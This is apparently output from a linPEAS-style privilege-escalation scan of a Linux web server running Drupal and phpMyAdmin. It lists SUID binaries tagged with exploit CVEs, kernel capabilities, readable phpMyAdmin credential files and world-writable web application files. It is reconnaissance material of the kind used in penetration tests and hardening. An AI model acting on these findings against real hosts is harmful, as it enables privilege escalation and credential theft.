-rwxr-xr-x 1 daoud daoud 93 Oct 11  2022 /home/daoud/leve/core/tests/Drupal/Tests/Composer/Plugin/Scaffold/fixtures/drupal-assets-fixture/assets/web.config
-rwxr-xr-x 1 daoud daoud 139 Oct 11  2022 /home/daoud/leve/vendor/web.config
-rwxr-xr-x 1 daoud daoud 4016 Oct 11  2022 /home/daoud/leve/web.config
-rwxr-xr-x 1 daoud daoud 4016 Oct 11  2022 /home/daoud/lobem/core/assets/scaffold/files/web.config
-rwxr-xr-x 1 daoud daoud 0 Oct 11  2022 /home/daoud/lobem/core/modules/system/tests/fixtures/HtaccessTest/web.config
-rwxr-xr-x 1 daoud daoud 93 Oct 11  2022 /home/daoud/lobem/core/tests/Drupal/Tests/Composer/Plugin/Scaffold/fixtures/drupal-assets-fixture/assets/web.config
-rwxr-xr-x 1 daoud daoud 139 Oct 11  2022 /home/daoud/lobem/vendor/web.config
-rwxr-xr-x 1 daoud daoud 4016 Oct 11  2022 /home/daoud/lobem/web.config
-rwxr-xr-x 1 daoud daoud 4016 Oct 11  2022 /home/daoud/lrza/core/assets/scaffold/files/web.config
-rwxr-xr-x 1 daoud daoud 0 Oct 11  2022 /home/daoud/lrza/core/modules/system/tests/fixtures/HtaccessTest/web.config
-rwxr-xr-x 1 daoud daoud 93 Oct 11  2022 /home/daoud/lrza/core/tests/Drupal/Tests/Composer/Plugin/Scaffold/fixtures/drupal-assets-fixture/assets/web.config
-rwxr-xr-x 1 daoud daoud 139 Oct 11  2022 /home/daoud/lrza/vendor/web.config
-rwxr-xr-x 1 daoud daoud 4016 Oct 11  2022 /home/daoud/lrza/web.config
-rwxr-xr-x 1 fdmingcri fdmingcri 139 Feb 20  2023 /home/fdmingcri/leve/vendor/web.config
-rwxr-xr-x 1 fdmingcri fdmingcri 4016 Feb 20  2023 /home/fdmingcri/leve/web.config
-rwxrwxrwx 1 www-data www-data 4039 Feb 12  2023 /srv/web/drupal-10.0.0/core/assets/scaffold/files/web.config
-rwxrwxrwx 1 www-data www-data 0 Feb 12  2023 /srv/web/drupal-10.0.0/core/modules/system/tests/fixtures/HtaccessTest/web.config
-rwxrwxrwx 1 www-data www-data 93 Feb 12  2023 /srv/web/drupal-10.0.0/core/tests/Drupal/Tests/Composer/Plugin/Scaffold/fixtures/drupal-assets-fixture/assets/web.config
-rwxrwxrwx 1 www-data www-data 139 Feb 12  2023 /srv/web/drupal-10.0.0/vendor/web.config
-rwxrwxrwx 1 www-data www-data 4039 Feb 12  2023 /srv/web/drupal-10.0.0/web.config
-rwxrwxrwx 1 www-data www-data 4039 Feb 12  2023 /srv/web/drupal-10.0.2/core/assets/scaffold/files/web.config




╔══════════╣ Analyzing Other Interesting Files (limit 70)
-rw-r--r-- 1 root root 3526 Aug  4  2021 /etc/skel/.bashrc
-rw-r--r-- 1 daoud daoud 3526 Jan  3  2023 /home/daoud/.bashrc
-rw-r--r-- 1 fdmingcri fdmingcri 3526 Feb 13  2023 /home/fdmingcri/.bashrc





-rw-r--r-- 1 root root 807 Aug  4  2021 /etc/skel/.profile
-rw-r--r-- 1 daoud daoud 807 Jan  3  2023 /home/daoud/.profile
-rw-r--r-- 1 fdmingcri fdmingcri 807 Feb 13  2023 /home/fdmingcri/.profile




╔══════════╣ Checking leaks in git repositories


                      ╔════════════════════════════════════╗
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════
                      ╚════════════════════════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strings Not Found
strace Not Found
-rwsr-xr-x 1 root root 19K Jan 13  2022 /usr/libexec/polkit-agent-helper-1
-rwsr-xr-x 1 root root 471K Sep 23 22:13 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 51K Jun  6  2023 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 23K Jan 13  2022 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-xr-x 1 root root 44K Feb  7  2020 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 58K Feb  7  2020 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 52K Feb  7  2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 63K Feb  7  2020 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 87K Feb  7  2020 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 35K Jan 20  2022 /bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 71K Jan 20  2022 /bin/su
-rwsr-xr-x 1 root root 55K Jan 20  2022 /bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8

╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root shadow 38K Aug 26  2021 /sbin/unix_chkpwd
-r-xr-sr-x 1 root postdrop 19K Jan 22  2023 /usr/sbin/postdrop
-r-xr-sr-x 1 root postdrop 23K Jan 22  2023 /usr/sbin/postqueue
-rwxr-sr-x 1 root mail 23K Feb  4  2021 /usr/bin/dotlockfile
-rwxr-sr-x 1 root shadow 31K Feb  7  2020 /usr/bin/expiry
-rwxr-sr-x 1 root shadow 79K Feb  7  2020 /usr/bin/chage
-rwxr-sr-x 1 root tty 23K Jan 20  2022 /usr/bin/write.ul (Unknown SGID binary)
  --- Checking for writable dependencies of /usr/bin/write.ul...
-rwxr-sr-x 1 root crontab 43K Feb 22  2021 /usr/bin/crontab
-rwxr-sr-x 1 root tty 35K Jan 20  2022 /usr/bin/wall
-rwxr-sr-x 1 root ssh 347K Sep 23 22:13 /usr/bin/ssh-agent

╔══════════╣ Checking misconfigurations of ld.so
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld.so
/etc/ld.so.conf
Content of /etc/ld.so.conf:
include /etc/ld.so.conf.d/*.conf

/etc/ld.so.conf.d
  /etc/ld.so.conf.d/libc.conf
  - /usr/local/lib
  /etc/ld.so.conf.d/x86_64-linux-gnu.conf
  - /usr/local/lib/x86_64-linux-gnu
  - /lib/x86_64-linux-gnu
  - /usr/lib/x86_64-linux-gnu

/etc/ld.so.preload
╔══════════╣ Capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
══╣ Current shell capabilities
CapInh:  0x0000000000000000=
CapPrm:  0x0000000000000000=
CapEff:	 0x0000000000000000=
CapBnd:  0x000001fcfdfcffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read,cap_perfmon,cap_bpf,cap_checkpoint_restore
CapAmb:  0x0000000000000000=

══╣ Parent process capabilities
CapInh:	 0x0000000000000000=
CapPrm:	 0x0000000000000000=
CapEff:	 0x0000000000000000=
CapBnd:	 0x000001fcfdfcffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read,cap_perfmon,cap_bpf,cap_checkpoint_restore
CapAmb:	 0x0000000000000000=


Files with capabilities (limited to 50):
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep

╔══════════╣ AppArmor binary profiles
-rw-r--r-- 1 root root 3448 Feb 19  2021 usr.bin.man
-rw-r--r-- 1 root root  730 Dec  4  2022 usr.sbin.mariadbd

╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls
files with acls in searched folders Not Found

╔══════════╣ Files (scripts) in /etc/profile.d/
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files
total 20
drwxr-xr-x  2 root root 4096 Jan 19  2023 .
drwxr-xr-x 77 root root 4096 Feb 12 12:28 ..
-rw-r--r--  1 root root  726 Aug 12  2020 bash_completion.sh
-rw-r--r--  1 root root 1107 Feb 10  2021 gawk.csh
-rw-r--r--  1 root root  757 Feb 10  2021 gawk.sh

╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d

═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No

╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/home/daoud/drupal-9.5.2
/home/daoud/drupal-9.5.2/themes
/home/daoud/drupal-9.5.2/themes/README.txt
/home/daoud/drupal-9.5.2/core
/home/daoud/drupal-9.5.2/core/globals.api.php
/home/daoud/drupal-9.5.2/core/.gitignore
/home/daoud/drupal-9.5.2/core/config
/home/daoud/drupal-9.5.2/core/config/schema
/home/daoud/drupal-9.5.2/core/config/schema/core.extension.schema.yml
/home/daoud/drupal-9.5.2/core/config/schema/core.menu.schema.yml
/home/daoud/drupal-9.5.2/core/config/schema/core.entity.schema.yml
/home/daoud/drupal-9.5.2/core/config/schema/core.data_types.schema.yml
/home/daoud/drupal-9.5.2/core/config/install
/home/daoud/drupal-9.5.2/core/config/install/core.menu.static_menu_link_overrides.yml
/home/daoud/drupal-9.5.2/core/config/install/core.extension.yml
/home/daoud/drupal-9.5.2/core/themes
/home/daoud/drupal-9.5.2/core/themes/seven
/home/daoud/drupal-9.5.2/core/themes/seven/config
/home/daoud/drupal-9.5.2/core/themes/seven/config/optional
/home/daoud/drupal-9.5.2/core/themes/seven/config/optional/block.block.seven_help_search.yml
/home/daoud/drupal-9.5.2/core/themes/seven/config/schema
/home/daoud/drupal-9.5.2/core/themes/seven/config/schema/seven.schema.yml
/home/daoud/drupal-9.5.2/core/themes/seven/css
/home/daoud/drupal-9.5.2/core/themes/seven/css/theme
/home/daoud/drupal-9.5.2/core/themes/seven/css/theme/filter.admin.css
/home/daoud/drupal-9.5.2/core/themes/seven/css/theme/install-page.css
/home/daoud/drupal-9.5.2/core/themes/seven/css/theme/update-report.css
/home/daoud/drupal-9.5.2/core/themes/seven/css/theme/media-library.css
/home/daoud/drupal-9.5.2/core/themes/seven/css/theme/ckeditor-admin.css

╔══════════╣ Searching folders owned by me containing others files on it (limit 100)
-rw-r--r-- 1 root root 8 Feb 15 00:00 /var/lib/apache2/fcgid/shm

╔══════════╣ Readable files belonging to root and readable by me but not world readable
-rw-r----- 1 root www-data 505 Jan 19  2023 /etc/phpmyadmin/config-db.php
-rw-r----- 1 root www-data 68 Jan 19  2023 /var/lib/phpmyadmin/blowfish_secret.inc.php
-r-------- 1 root root 4 Feb 15 09:14 /sys/devices/system/cpu/cpu21/crash_notes_size
-r-------- 1 root root 10 Feb 15 09:14 /sys/devices/system/cpu/cpu21/crash_notes
-r-------- 1 root root 4 Feb 15 09:14 /sys/devices/system/cpu/cpu11/crash_notes_size
-r-------- 1 root root 10 Feb 15 09:14 /sys/devices/system/cpu/cpu11/crash_notes
-r-------- 1 root root 4 Feb 15 09:14 /sys/devices/system/cpu/cpu9/crash_notes_size
-r-------- 1 root root 10 Feb 15 09:14 /sys/devices/system/cpu/cpu9/crash_notes
-r-------- 1 root root 4 Feb 15 09:14 /sys/devices/system/cpu/cpu7/crash_notes_size
-r-------- 1 root root 10 Feb 15 09:14 /sys/devices/system/cpu/cpu7/crash_notes
-r-------- 1 root root 4 Feb 15 09:14 /sys/devices/system/cpu/cpu28/crash_notes_size
-r-------- 1 root root 10 Feb 15 09:14 /sys/devices/system/cpu/cpu28/crash_notes
-r-------- 1 root root 4 Feb 15 09:14 /sys/devices/system/cpu/cpu18/crash_notes_size
-r-------- 1 root root 10 Feb 15 09:14 /sys/devices/system/cpu/cpu18/crash_notes
-r-------- 1 root root 4 Feb 15 09:14 /sys/devices/system/cpu/cpu5/crash_notes_size
-r-------- 1 root root 10 Feb 15 09:14 /sys/devices/system/cpu/cpu5/crash_notes
-r-------- 1 root root 4 Feb 15 09:14 /sys/devices/system/cpu/cpu26/crash_notes_size
-r-------- 1 root root 10 Feb 15 09:14 /sys/devices/system/cpu/cpu26/crash_notes
-r-------- 1 root root 4 Feb 15 09:14 /sys/devices/system/cpu/cpu16/crash_notes_size
-r-------- 1 root root 10 Feb 15 09:14 /sys/devices/system/cpu/cpu16/crash_notes
-r-------- 1 root root 4 Feb 15 09:14 /sys/devices/system/cpu/cpu3/crash_notes_size
-r-------- 1 root root 10 Feb 15 09:14 /sys/devices/system/cpu/cpu3/crash_notes
-r-------- 1 root root 4 Feb 15 09:14 /sys/devices/system/cpu/cpu24/crash_notes_size
-r-------- 1 root root 10 Feb 15 09:14 /sys/devices/system/cpu/cpu24/crash_notes
-r-------- 1 root root 4 Feb 15 09:14 /sys/devices/system/cpu/cpu14/crash_notes_size
-r-------- 1 root root 10 Feb 15 09:14 /sys/devices/system/cpu/cpu14/crash_notes
-r-------- 1 root root 4 Feb 15 09:14 /sys/devices/system/cpu/cpu1/crash_notes_size
-r-------- 1 root root 10 Feb 15 09:14 /sys/devices/system/cpu/cpu1/crash_notes
-r-------- 1 root root 4 Feb 15 09:14 /sys/devices/system/cpu/cpu22/crash_notes_size
-r-------- 1 root root 10 Feb 15 09:14 /sys/devices/system/cpu/cpu22/crash_notes
-r-------- 1 root root 4 Feb 15 09:14 /sys/devices/system/cpu/cpu12/crash_notes_size
-r-------- 1 root root 10 Feb 15 09:14 /sys/devices/system/cpu/cpu12/crash_notes
-r-------- 1 root root 4 Feb 15 09:14 /sys/devices/system/cpu/cpu30/crash_notes_size
-r-------- 1 root root 10 Feb 15 09:14 /sys/devices/system/cpu/cpu30/crash_notes
-r-------- 1 root root 4 Feb 15 09:14 /sys/devices/system/cpu/cpu20/crash_notes_size
-r-------- 1 root root 10 Feb 15 09:14 /sys/devices/system/cpu/cpu20/crash_notes
-r-------- 1 root root 4 Feb 15 09:14 /sys/devices/system/cpu/cpu10/crash_notes_size
-r-------- 1 root root 10 Feb 15 09:14 /sys/devices/system/cpu/cpu10/crash_notes
-r-------- 1 root root 4 Feb 15 09:14 /sys/devices/system/cpu/cpu8/crash_notes_size
-r-------- 1 root root 10 Feb 15 09:14 /sys/devices/system/cpu/cpu8/crash_notes
-r-------- 1 root root 8 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy11/cpuinfo_cur_freq
--w------- 1 root root 0 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy11/stats/reset
-r-------- 1 root root 8 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy8/cpuinfo_cur_freq
--w------- 1 root root 0 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy8/stats/reset
-r-------- 1 root root 8 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy6/cpuinfo_cur_freq
--w------- 1 root root 0 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy6/stats/reset
-r-------- 1 root root 8 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy28/cpuinfo_cur_freq
--w------- 1 root root 0 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy28/stats/reset
-r-------- 1 root root 8 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy18/cpuinfo_cur_freq
--w------- 1 root root 0 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy18/stats/reset
-r-------- 1 root root 8 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy4/cpuinfo_cur_freq
--w------- 1 root root 0 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy4/stats/reset
-r-------- 1 root root 8 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy26/cpuinfo_cur_freq
--w------- 1 root root 0 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy26/stats/reset
-r-------- 1 root root 8 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy16/cpuinfo_cur_freq
--w------- 1 root root 0 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy16/stats/reset
-r-------- 1 root root 8 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy2/cpuinfo_cur_freq
--w------- 1 root root 0 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy2/stats/reset
-r-------- 1 root root 8 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy24/cpuinfo_cur_freq
--w------- 1 root root 0 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy24/stats/reset
-r-------- 1 root root 8 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy14/cpuinfo_cur_freq
--w------- 1 root root 0 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy14/stats/reset
-r-------- 1 root root 8 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy0/cpuinfo_cur_freq
--w------- 1 root root 0 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy0/stats/reset
-r-------- 1 root root 8 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy22/cpuinfo_cur_freq
--w------- 1 root root 0 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy22/stats/reset
-r-------- 1 root root 8 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy12/cpuinfo_cur_freq
--w------- 1 root root 0 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy12/stats/reset
-r-------- 1 root root 8 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy9/cpuinfo_cur_freq
--w------- 1 root root 0 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy9/stats/reset
-r-------- 1 root root 8 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy30/cpuinfo_cur_freq
--w------- 1 root root 0 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy30/stats/reset
-r-------- 1 root root 8 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy20/cpuinfo_cur_freq
--w------- 1 root root 0 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy20/stats/reset
-r-------- 1 root root 8 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy10/cpuinfo_cur_freq
--w------- 1 root root 0 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy10/stats/reset
-r-------- 1 root root 8 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy7/cpuinfo_cur_freq
--w------- 1 root root 0 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy7/stats/reset
-r-------- 1 root root 8 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy29/cpuinfo_cur_freq
--w------- 1 root root 0 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy29/stats/reset
-r-------- 1 root root 8 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy19/cpuinfo_cur_freq
--w------- 1 root root 0 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy19/stats/reset
-r-------- 1 root root 8 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy5/cpuinfo_cur_freq
--w------- 1 root root 0 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy5/stats/reset
-r-------- 1 root root 8 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy27/cpuinfo_cur_freq
--w------- 1 root root 0 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy27/stats/reset
-r-------- 1 root root 8 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy17/cpuinfo_cur_freq
--w------- 1 root root 0 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy17/stats/reset
-r-------- 1 root root 8 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy3/cpuinfo_cur_freq
--w------- 1 root root 0 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy3/stats/reset
-r-------- 1 root root 8 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy25/cpuinfo_cur_freq
--w------- 1 root root 0 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy25/stats/reset
-r-------- 1 root root 8 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy15/cpuinfo_cur_freq
--w------- 1 root root 0 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy15/stats/reset
-r-------- 1 root root 8 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy1/cpuinfo_cur_freq
--w------- 1 root root 0 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy1/stats/reset
-r-------- 1 root root 8 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy23/cpuinfo_cur_freq
--w------- 1 root root 0 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy23/stats/reset
-r-------- 1 root root 8 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy13/cpuinfo_cur_freq
--w------- 1 root root 0 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy13/stats/reset
-r-------- 1 root root 8 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy31/cpuinfo_cur_freq
--w------- 1 root root 0 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy31/stats/reset
-r-------- 1 root root 8 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy21/cpuinfo_cur_freq
--w------- 1 root root 0 Feb 15 09:14 /sys/devices/system/cpu/cpufreq/policy21/stats/reset
-r-------- 1 root root 4 Feb 15 09:14 /sys/devices/system/cpu/cpu29/crash_notes_size
-r-------- 1 root root 10 Feb 15 09:14 /sys/devices/system/cpu/cpu29/crash_notes
-r-------- 1 root root 4 Feb 15 09:14 /sys/devices/system/cpu/cpu19/crash_notes_size
-r-------- 1 root root 10 Feb 15 09:14 /sys/devices/system/cpu/cpu19/crash_notes
-r-------- 1 root root 4 Feb 15 09:14 /sys/devices/system/cpu/cpu6/crash_notes_size
-r-------- 1 root root 10 Feb 15 09:14 /sys/devices/system/cpu/cpu6/crash_notes
-r-------- 1 root root 4 Feb 15 09:14 /sys/devices/system/cpu/cpu27/crash_notes_size
-r-------- 1 root root 10 Feb 15 09:14 /sys/devices/system/cpu/cpu27/crash_notes
-r-------- 1 root root 4 Feb 15 09:14 /sys/devices/system/cpu/cpu17/crash_notes_size
-r-------- 1 root root 10 Feb 15 09:14 /sys/devices/system/cpu/cpu17/crash_notes
-r-------- 1 root root 4 Feb 15 09:14 /sys/devices/system/cpu/cpu4/crash_notes_size
-r-------- 1 root root 10 Feb 15 09:14 /sys/devices/system/cpu/cpu4/crash_notes
-r-------- 1 root root 4 Feb 15 09:14 /sys/devices/system/cpu/cpu25/crash_notes_size
-r-------- 1 root root 10 Feb 15 09:14 /sys/devices/system/cpu/cpu25/crash_notes
-r-------- 1 root root 4 Feb 15 09:14 /sys/devices/system/cpu/cpu15/crash_notes_size
-r-------- 1 root root 10 Feb 15 09:14 /sys/devices/system/cpu/cpu15/crash_notes
-r-------- 1 root root 4 Feb 15 09:14 /sys/devices/system/cpu/cpu2/crash_notes_size
-r-------- 1 root root 10 Feb 15 09:14 /sys/devices/system/cpu/cpu2/crash_notes
-r-------- 1 root root 4 Feb 15 09:14 /sys/devices/system/cpu/cpu23/crash_notes_size
-r-------- 1 root root 10 Feb 15 09:14 /sys/devices/system/cpu/cpu23/crash_notes
-r-------- 1 root root 4 Feb 15 09:14 /sys/devices/system/cpu/cpu13/crash_notes_size
-r-------- 1 root root 10 Feb 15 09:14 /sys/devices/system/cpu/cpu13/crash_notes
-r-------- 1 root root 4 Feb 15 09:14 /sys/devices/system/cpu/cpu0/crash_notes_size
-r-------- 1 root root 10 Feb 15 09:14 /sys/devices/system/cpu/cpu0/crash_notes
-r-------- 1 root root 4 Feb 15 09:14 /sys/devices/system/cpu/cpu31/crash_notes_size
-r-------- 1 root root 10 Feb 15 09:14 /sys/devices/system/cpu/cpu31/crash_notes

╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/.lxc/proc/19514
/dev/.lxc/proc/20659
/dev/.lxc/proc/21525
/dev/.lxc/proc/21528
/dev/.lxc/proc/21540
#)You_can_write_even_more_files_inside_last_directory

/dev/mqueue
/dev/ptmx
/dev/shm
/opt/phpMyAdmin
/opt/phpMyAdmin/.rtlcssrc.json
/opt/phpMyAdmin/CONTRIBUTING.md
/opt/phpMyAdmin/ChangeLog
/opt/phpMyAdmin/LICENSE
/opt/phpMyAdmin/README
#)You_can_write_even_more_files_inside_last_directory

/opt/phpMyAdmin/doc/html
/opt/phpMyAdmin/doc/html/_images
/opt/phpMyAdmin/doc/html/_sources
/opt/phpMyAdmin/doc/html/_sources/bookmarks.rst.txt
/opt/phpMyAdmin/doc/html/_sources/charts.rst.txt
/opt/phpMyAdmin/doc/html/_sources/config.rst.txt
/opt/phpMyAdmin/doc/html/_sources/copyright.rst.txt
/opt/phpMyAdmin/doc/html/_sources/credits.rst.txt
#)You_can_write_even_more_files_inside_last_directory

/opt/phpMyAdmin/doc/html/_static
/opt/phpMyAdmin/doc/html/_static/basic.css
/opt/phpMyAdmin/doc/html/_static/classic.css
/opt/phpMyAdmin/doc/html/_static/default.css
/opt/phpMyAdmin/doc/html/_static/doctools.js
/opt/phpMyAdmin/doc/html/_static/documentation_options.js
#)You_can_write_even_more_files_inside_last_directory

/opt/phpMyAdmin/doc/html/bookmarks.html
/opt/phpMyAdmin/doc/html/charts.html
/opt/phpMyAdmin/doc/html/config.html
/opt/phpMyAdmin/doc/html/copyright.html
/opt/phpMyAdmin/doc/html/credits.html
#)You_can_write_even_more_files_inside_last_directory

/opt/phpMyAdmin/examples
/opt/phpMyAdmin/examples/config.manyhosts.inc.php
/opt/phpMyAdmin/examples/openid.php
/opt/phpMyAdmin/examples/signon-script.php
/opt/phpMyAdmin/examples/signon.php
/opt/phpMyAdmin/favicon.ico
/opt/phpMyAdmin/index.php
/opt/phpMyAdmin/js
/opt/phpMyAdmin/js/config
/opt/phpMyAdmin/js/config/ol
/opt/phpMyAdmin/js/config/ol/webpack.config.js
/opt/phpMyAdmin/js/dist
/opt/phpMyAdmin/js/dist/ajax.js
/opt/phpMyAdmin/js/dist/chart.js
/opt/phpMyAdmin/js/dist/codemirror
/opt/phpMyAdmin/js/dist/codemirror/addon
/opt/phpMyAdmin/js/dist/codemirror/addon/lint
/opt/phpMyAdmin/js/dist/codemirror/addon/lint/sql-lint.js
/opt/phpMyAdmin/js/dist/common.js
/opt/phpMyAdmin/js/dist/config.js
/opt/phpMyAdmin/js/dist/console.js
/opt/phpMyAdmin/js/dist/cross_framing_protection.js
/opt/phpMyAdmin/js/dist/database
/opt/phpMyAdmin/js/dist/database/central_columns.js
/opt/phpMyAdmin/js/dist/database/events.js
/opt/phpMyAdmin/js/dist/database/multi_table_query.js
/opt/phpMyAdmin/js/dist/database/operations.js
/opt/phpMyAdmin/js/dist/database/qbe.js
#)You_can_write_even_more_files_inside_last_directory

/opt/phpMyAdmin/js/dist/designer
/opt/phpMyAdmin/js/dist/designer/database.js
/opt/phpMyAdmin/js/dist/designer/history.js
/opt/phpMyAdmin/js/dist/designer/init.js
/opt/phpMyAdmin/js/dist/designer/move.js
/opt/phpMyAdmin/js/dist/designer/objects.js
#)You_can_write_even_more_files_inside_last_directory

/opt/phpMyAdmin/js/dist/doclinks.js
/opt/phpMyAdmin/js/dist/drag_drop_import.js
/opt/phpMyAdmin/js/dist/error_report.js
/opt/phpMyAdmin/js/dist/export.js
/opt/phpMyAdmin/js/dist/export_output.js
#)You_can_write_even_more_files_inside_last_directory

/opt/phpMyAdmin/js/dist/jqplot/plugins
/opt/phpMyAdmin/js/dist/jqplot/plugins/jqplot.byteFormatter.js
/opt/phpMyAdmin/js/dist/jquery.sortable-table.js
/opt/phpMyAdmin/js/dist/keyhandler.js
/opt/phpMyAdmin/js/dist/makegrid.js
/opt/phpMyAdmin/js/dist/menu_resizer.js
/opt/phpMyAdmin/js/dist/multi_column_sort.js
#)You_can_write_even_more_files_inside_last_directory

/opt/phpMyAdmin/js/dist/server/databases.js
/opt/phpMyAdmin/js/dist/server/plugins.js
/opt/phpMyAdmin/js/dist/server/privileges.js
/opt/phpMyAdmin/js/dist/server/status
/opt/phpMyAdmin/js/dist/server/status/monitor.js
/opt/phpMyAdmin/js/dist/server/status/processes.js
/opt/phpMyAdmin/js/dist/server/status/queries.js
/opt/phpMyAdmin/js/dist/server/status/sorter.js
/opt/phpMyAdmin/js/dist/server/status/variables.js
/opt/phpMyAdmin/js/dist/server/user_groups.js
/opt/phpMyAdmin/js/dist/server/variables.js
/opt/phpMyAdmin/js/dist/setup
